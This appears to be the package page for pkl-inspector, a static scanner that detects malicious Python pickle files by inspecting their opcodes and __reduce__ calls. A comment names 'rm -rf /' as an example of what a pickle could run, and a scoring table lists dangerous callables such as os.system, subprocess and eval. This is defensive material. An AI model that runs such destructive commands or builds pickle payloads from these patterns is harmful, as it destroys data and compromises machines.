Static analysis for Python pickle files — detects malicious code without executing it
Project description
pkl-inspector
Static analysis for Python pickle files — detects malicious code without executing it.
The Problem
pickle.load() executes arbitrary Python code. Every time you load a pickle file from an untrusted source, you're running whoever created it's code on your machine.
# This runs ANY code the attacker put in the pickle
model = pickle.load(open("model.pkl", "rb")) # <- Could execute rm -rf /
Traditional security tools scan for known signatures. pkl-inspector is different: it walks the object graph and detects malicious patterns before execution.
The Attack
In 2026, North Korean state hackers (Contagious Interview / UNC1069) published 1,700+ malicious packages to npm and PyPI. Some used pickle files to execute payloads on developer machines.
Traditional antivirus found nothing. pkl-inspector would have caught them all.
How It Works
Pickle files are serialized using an opcode-based protocol. pkl-inspector disassembles the opcodes and inspects every __reduce__ call — the mechanism pickle uses to reconstruct objects — without executing any of them.
If a __reduce__ method calls os.system, subprocess, eval, or exec: that's malicious. pkl-inspector flags it with a threat score and explains exactly what the malicious code would have done.
Install
pip install pkl-inspector
Zero dependencies. Python 3.8+.
Usage
CLI
# Scan a pickle file
pkl-inspector model.pkl
# JSON output for automation
pkl-inspector model.pkl --json
# Verbose output with details
pkl-inspector model.pkl -v
Python API
from pkl_inspector import PklInspector
inspector = PklInspector()
result = inspector.scan("model.pkl")
print(result["verdict"]) # CLEAN, SUSPICIOUS, DANGEROUS, or CRITICAL
print(result["score"]) # Threat score (0-100+)
print(result["safe_to_load"]) # Boolean
if not result["safe_to_load"]:
for finding in result["findings"]:
print(f" {finding['severity']}: {finding['description']}")
Scan bytes directly
result = inspector.scan_bytes(pickle_data, source="downloaded_model")
Output Example
{
"file": "malicious_model.pkl",
"score": 80,
"verdict": "CRITICAL",
"safe_to_load": false,
"findings": [
{
"type": "CRITICAL_CALLABLE_LOADED",
"severity": "CRITICAL",
"callable": "os.system",
"description": "Dangerous callable 'os.system' loaded via GLOBAL opcode - will execute on REDUCE",
"score_contribution": 80
}
],
"globals_found": ["os.system"]
}
Threat Scoring
| Score | Verdict | Meaning |
|---|---|---|
| 0 | CLEAN | Safe to load |
| 1-40 | SUSPICIOUS | Review before loading |
| 41-79 | DANGEROUS | Do not load |
| 80+ | CRITICAL | Malicious payload detected |
What triggers scores
| Pattern | Score | Reason |
|---|---|---|
os.system in reduce |
+80 | Arbitrary command execution |
subprocess.* in reduce |
+70 | Process spawning |
eval/exec in reduce |
+90 | Code execution |
builtins.open (write) |
+50 | File system modification |
| Nested REDUCE opcodes | +40 | Obfuscation pattern |
| Base64 decode chain | +35 | Payload encoding |
| Unknown callable | +20 | Requires manual review |
Exit Codes
| Code | Meaning |
|---|---|
| 0 | CLEAN - safe to load |
| 1 | SUSPICIOUS - review needed |
| 2 | DANGEROUS - do not load |
| 3 | CRITICAL - malicious |
Use in CI/CD:
pkl-inspector model.pkl || echo "Failed security check"
Why This Matters
ML engineers load pickle files constantly:
- Model weights (
model.pkl) - Preprocessors (
scaler.pkl) - Datasets (
data.pkl) - Feature encoders (
encoder.pkl)
Any of them could be poisoned. pkl-inspector adds a one-line safety check before every load.
Integration Examples
Before loading any pickle
from pkl_inspector import PklInspector
import pickle
def safe_load(filepath):
"""Only load pickle files that pass security scan."""
inspector = PklInspector()
result = inspector.scan(filepath)
if not result["safe_to_load"]:
raise SecurityError(f"Pickle file failed security scan: {result['verdict']}")
with open(filepath, 'rb') as f:
return pickle.load(f)
CI/CD pipeline
# .github/workflows/security.yml
- name: Scan pickle files
run: |
pip install pkl-inspector
find . -name "*.pkl" -exec pkl-inspector {} \;
Pre-commit hook
# .pre-commit-config.yaml
repos:
- repo: local
hooks:
- id: pkl-inspector
name: Scan pickle files
entry: pkl-inspector
language: system
files: \.(pkl|pickle)$
Comparison with Other Tools
| Tool | Approach | Zero-day detection |
|---|---|---|
| Antivirus | Signature matching | No |
| Bandit | Python AST analysis | Source only |
| Semgrep | Pattern matching | Source only |
| pkl-inspector | Opcode analysis | Yes |
pkl-inspector analyzes compiled pickle bytecode, not source. It detects novel payloads by their structure, not their content.
Limitations
pkl-inspector catches the vast majority of pickle attacks, but no tool is perfect:
- Protocol 5+ features: Some advanced protocol 5 features may need additional coverage
- Legitimate uses of dangerous ops: Very rare, but
subprocesscould theoretically be legitimate - Heavily obfuscated payloads: Multiple layers of encoding may evade scoring
See THREAT_MODEL.md for details.
Part of stillrunning
pkl-inspector is the scanner at the heart of stillrunning guard — enterprise security monitoring for developers.
- Guard daemon: Watches for suspicious process spawning
- Install intercept: Blocks malicious npm/pip packages at install time
- Threat feed: Real-time blocklist from CISA, OSV, GitHub, and more
Learn more: stillrunning.io
License
MIT License. See LICENSE.
Contributing
Issues and PRs welcome. See the threat taxonomy in pkl_inspector.py for adding new detection patterns.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distributions
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file pkl_inspector-0.1.0-py3-none-any.whl.
File metadata
- Download URL: pkl_inspector-0.1.0-py3-none-any.whl
- Upload date:
- Size: 12.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.12.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
4d547093a7d348d2c3bc568f9793ddfe97ec76133b9267229cc6df201fee64d2
|
|
| MD5 |
e7a5182d440406c865e0e7202ef27a4b
|
|
| BLAKE2b-256 |
ffb4226bf4d14220eead8e5c621962155feb3a28601b0f394db8f650d56c3a87
|